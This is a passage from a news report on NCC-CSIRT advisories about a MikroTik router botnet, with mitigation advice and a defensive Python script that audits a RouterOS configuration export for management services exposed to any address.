    Additionally, according to CSIRT, “all downloads and email attachments should be opened with caution, even if they are from trusted sites or senders. Users should also ensure that attachments are scanned with an up-to-date antimalware solution before opening.”

    The second cyber threat discovered by the NCC-CSIRT is a botnet that targets MikroTik routers. As CSIRT revealed, thousands of vulnerable MikroTik routers are being used to constitute what has been named one of the largest botnets in history.

    The botnet exploits an already-known directory traversal vulnerability in the WinBox interface, which allows unauthenticated remote attackers to read arbitrary files and authenticated remote attackers to write arbitrary files. The vulnerability, which the vendor fixed some time ago, allowed the perpetrators to enslave unpatched routers and then rent them out as a service.

    According to new research published by Avast, a cryptocurrency mining campaign taking advantage of the recently disrupted Glupteba botnet, as well as the notorious TrickBot malware, were found to have been distributed from the same command-and-control (C2) server. The C2 server functions as a botnet-as-a-service controlling nearly 230,000 vulnerable MikroTik routers. The botnet has been linked to what is now called the Meris botnet.

    The threat types emanating from the botnet include authentication bypass, data loss, denial of service, remote code execution, password sniffing and unauthorised access. The resulting dangers to victims include malware distribution, cryptocurrency mining that consumes system resources, remote code execution and data theft.

    To be protected against this botnet, the NCC-CSIRT advised users to apply the latest router patches as soon as they are released, set strong router passwords, block access to the routers’ administration interfaces from the public Internet, stay away from illegitimate or cracked versions of legitimate applications, and use decent antivirus software with built-in web filtering.
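    The WinBox interface that the botnet abused is one of several management services a RouterOS device exposes, and "keep it off the public side" is checkable from the router's own configuration export. The following is an added audit example, not code from the advisory or from MikroTik: it parses the `/ip service` section of a `/export verbose` and flags every enabled service with no `address=` restriction (or one that covers all addresses), and reports the default `admin` account still being present. The export text is constructed. The verbose export matters because a plain `/export` omits settings at their defaults, so a missing `winbox` line means "default", not "disabled"; the script reports services it cannot see for that reason.

```python
"""Audit a RouterOS `/export verbose` for management services reachable from anywhere."""
import shlex

MGMT_SERVICES = {"telnet", "ftp", "www", "ssh", "www-ssl", "api", "api-ssl", "winbox"}
PUBLIC = {"", "0.0.0.0/0", "::/0"}   # an empty address= means no restriction at all


def parse_export(text):
    """Yield (section, verb, positional_args, {key: value}) for each set/add line."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            section = line
            continue
        tokens = shlex.split(line)   # handles quoted values such as address=""
        if not tokens:
            continue
        positional = [t for t in tokens[1:] if "=" not in t]
        kv = dict(t.split("=", 1) for t in tokens[1:] if "=" in t)
        yield section, tokens[0], positional, kv


def audit_export(text):
    """Return a list of human-readable findings for the export."""
    findings, seen = [], set()
    for section, verb, positional, kv in parse_export(text):
        if section == "/ip service" and verb == "set" and positional:
            name = positional[0]
            seen.add(name)
            if kv.get("disabled", "no") == "yes":
                continue
            addrs = {a.strip() for a in kv.get("address", "").split(",")}
            if addrs & PUBLIC:
                findings.append(f"{name}: enabled and reachable from any address "
                                f"(set address= to your management subnets, or disable it)")
        elif section == "/user" and verb == "add" and kv.get("name") == "admin":
            findings.append("user 'admin': default account name still in use "
                            "(rename it and set a strong password)")
    for name in sorted(MGMT_SERVICES - seen):
        findings.append(f"{name}: not present in export; re-run '/export verbose' so defaults are visible")
    return findings


# Constructed export (not from a real device).
SAMPLE_EXPORT = """\
# mar/15/2022 10:00:00 by RouterOS
# software id = XXXX-XXXX
/ip service
set telnet address="" disabled=yes port=23
set ftp address="" disabled=yes port=21
set www address=192.168.88.0/24 disabled=no port=80
set ssh address=192.168.88.0/24,10.0.0.0/8 disabled=no port=22
set www-ssl address="" certificate=none disabled=yes port=443
set api address="" disabled=yes port=8728
set winbox address="" disabled=no port=8291
set api-ssl address="" certificate=none disabled=no port=8729
/user
add name=admin group=full
/system identity
set name=edge-router
"""

if __name__ == "__main__":
    for finding in audit_export(SAMPLE_EXPORT):
        print("-", finding)
```

    Fetch the export with `ssh admin@router '/export verbose'` and pipe it in. Restricting `address=` on the services is the configuration-level control; a matching input-chain firewall rule that drops management ports from the WAN interface is the belt to go with those braces, and applying the vendor's current release closes the WinBox traversal flaw itself.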